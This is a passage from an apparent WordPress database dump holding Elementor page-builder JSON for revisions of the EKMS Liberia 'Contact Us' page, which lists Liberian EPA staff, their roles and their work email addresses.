Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat\\n\\n<a href=\\\"mailto:jsokanst7@yahoo.com\\\">jsokanst7@yahoo.com<\\/a>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14723,2335,'_elementor_edit_mode','builder'),(14724,2335,'_elementor_template_type','wp-page'),(14725,2335,'_elementor_version','2.7.5'),(14726,2335,'_wp_page_template','default'),(14727,2335,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n\\nManager, Compliance and Enforcement\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14730,2336,'_elementor_edit_mode','builder'),(14731,2336,'_elementor_template_type','wp-page'),(14732,2336,'_elementor_version','2.7.5'),(14733,2336,'_wp_page_template','default'),(14734,2336,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact 